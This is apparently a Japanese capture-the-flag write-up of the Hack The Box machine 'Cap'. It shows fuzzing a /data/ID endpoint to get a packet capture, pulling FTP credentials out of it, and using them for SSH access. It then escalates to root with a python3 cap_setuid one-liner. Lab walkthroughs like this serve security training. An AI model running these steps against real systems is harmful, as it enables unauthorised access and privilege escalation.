目次
偵察/スキャン
nmapでスキャンします。
PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2vrva1a+HtV5SnbxxtZSs+D8/EXPL2wiqOUG2ngq9zaPlF6cuLX3P2QYvGfh5bcAIVjIqNUmmc1eSHVxtbmNEQjyJdjZOP4i2IfX/RZUA18dWTfEWlNaoVDGBsc8zunvFk3nkyaynnXmlH7n3BLb1nRNyxtouW+q7VzhA6YK3ziOD6tXT7MMnDU7CfG1PfMqdU297OVP35BODg1gZawthjxMi5i5R1g3nyODudFoWaHu9GZ3D/dSQbMAxsly98L1Wr6YJ6M6xfqDurgOAl9i6TZ4zx93c/h1MO+mKH7EobPR/ZWrFGLeVFZbB6jYEflCty8W8Dwr7HOdF1gULr+Mj+BcykLlzPoEhD7YqjRBm8SHdicPP1huq+/3tN7Q/IOf68NNJDdeq6QuGKh1CKqloT/+QZzZcJRubxULUg8YLGsYUHd1umySv4cHHEXRl7vcZJst78eBqnYUtN3MweQr4ga1kQP4YZK5qUQCTPPmrKMa9NPh1sjHSdS8IwiH12V0= | 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDqG/RCH23t5Pr9sw6dCqvySMHEjxwCfMzBDypoNIMIa8iKYAe84s/X7vDbA9T/vtGDYzS+fw8I5MAGpX8deeKI= | 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPbLTiQl+6W0EOi8vS+sByUiZdBsuz0v/7zITtSuaTFH 80/tcp open http syn-ack ttl 63 Gunicorn |_http-title: Security Dashboard |_http-server-header: gunicorn | http-methods: |_ Supported Methods: OPTIONS HEAD GET
ブラウザでアクセスすると以下のようなページが表示されます。
Security Snapshotにアクセスすると/dataの後の数字が変化しています。
番号をファジングします。
┌──(kali㉿kali)-[~/htb/cap]
└─$ seq 0 100 > number.txt
┌──(kali㉿kali)-[~/htb/cap]
└─$ ffuf -u http://10.129.14.110/data/FUZZ -w number.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.14.110/data/FUZZ
:: Wordlist : FUZZ: /home/kali/htb/cap/number.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
39 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
14 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 178ms]
17 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 178ms]
15 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
21 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 180ms]
16 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
28 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
29 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 182ms]
25 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 182ms]
34 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 182ms]
30 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 183ms]
36 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 185ms]
35 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 184ms]
31 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 185ms]
32 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 185ms]
37 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 187ms]
38 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 187ms]
33 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 188ms]
9 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 188ms]
20 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 184ms]
22 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 191ms]
27 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 191ms]
24 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 191ms]
11 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 189ms]
8 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 190ms]
26 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 194ms]
23 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 195ms]
12 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 193ms]
13 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 193ms]
10 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 194ms]
18 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 202ms]
19 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 211ms]
4 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 303ms]
1 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 312ms]
3 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 316ms]
41 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 178ms]
42 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
40 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 180ms]
2 [Status: 200, Size: 17147, Words: 7066, Lines: 371, Duration: 180ms]
43 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
45 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
44 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 180ms]
49 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 178ms]
48 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 178ms]
46 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 180ms]
47 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 180ms]
54 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
51 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 180ms]
52 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
53 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
50 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
56 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
57 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
58 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
55 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
59 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
6 [Status: 200, Size: 17144, Words: 7066, Lines: 371, Duration: 188ms]
5 [Status: 200, Size: 17144, Words: 7066, Lines: 371, Duration: 189ms]
61 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 182ms]
7 [Status: 200, Size: 17144, Words: 7066, Lines: 371, Duration: 193ms]
65 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
63 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 182ms]
62 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 182ms]
60 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 185ms]
66 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
64 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 184ms]
68 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
67 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
69 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 182ms]
70 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
71 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 178ms]
0 [Status: 200, Size: 17147, Words: 7066, Lines: 371, Duration: 227ms]
72 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 175ms]
73 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 174ms]
74 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 174ms]
77 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 174ms]
78 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 174ms]
75 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 176ms]
76 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 176ms]
79 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 175ms]
80 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 175ms]
81 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 175ms]
82 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 174ms]
83 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 176ms]
85 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
84 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
87 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 176ms]
86 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 176ms]
91 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
92 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
94 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
98 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 174ms]
90 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
88 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 183ms]
93 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
95 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
89 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 177ms]
96 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 181ms]
100 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 176ms]
97 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 182ms]
99 [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 179ms]
:: Progress: [101/101] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
/data/0のファイルにはFTPの通信が含まれており、ストリームで表示するとnathan/Buck3tH4TF0RM3!のアカウント情報が確認できます。
user.txt取得
FTPで確認できたアカウント情報でSSHアクセスするとuser.txtが取得できます。
┌──(kali㉿kali)-[~/htb/cap] └─$ ssh nathan@10.129.14.110 ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to "store now, decrypt later" attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html nathan@10.129.14.110's password: Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu Apr 2 14:17:47 UTC 2026 System load: 0.08 Usage of /: 36.8% of 8.73GB Memory usage: 23% Swap usage: 0% Processes: 228 Users logged in: 0 IPv4 address for eth0: 10.129.14.110 IPv6 address for eth0: dead:beef::250:56ff:feb0:673b => There are 4 zombie processes. 63 updates can be applied immediately. 42 of these updates are standard security updates. To see these additional updates run: apt list --upgradable The list of available updates is more than a week old. To check for new updates run: sudo apt update Last login: Thu May 27 11:21:27 2021 from 10.10.14.7 nathan@cap:~$ ls user.txt nathan@cap:~$
権限昇格
linpeasの結果などからcap_setuidがPythonにあることが確認できます。
この情報をもとにrootへ昇格します。
nathan@cap:~$ getcap -r / 2> /dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
#
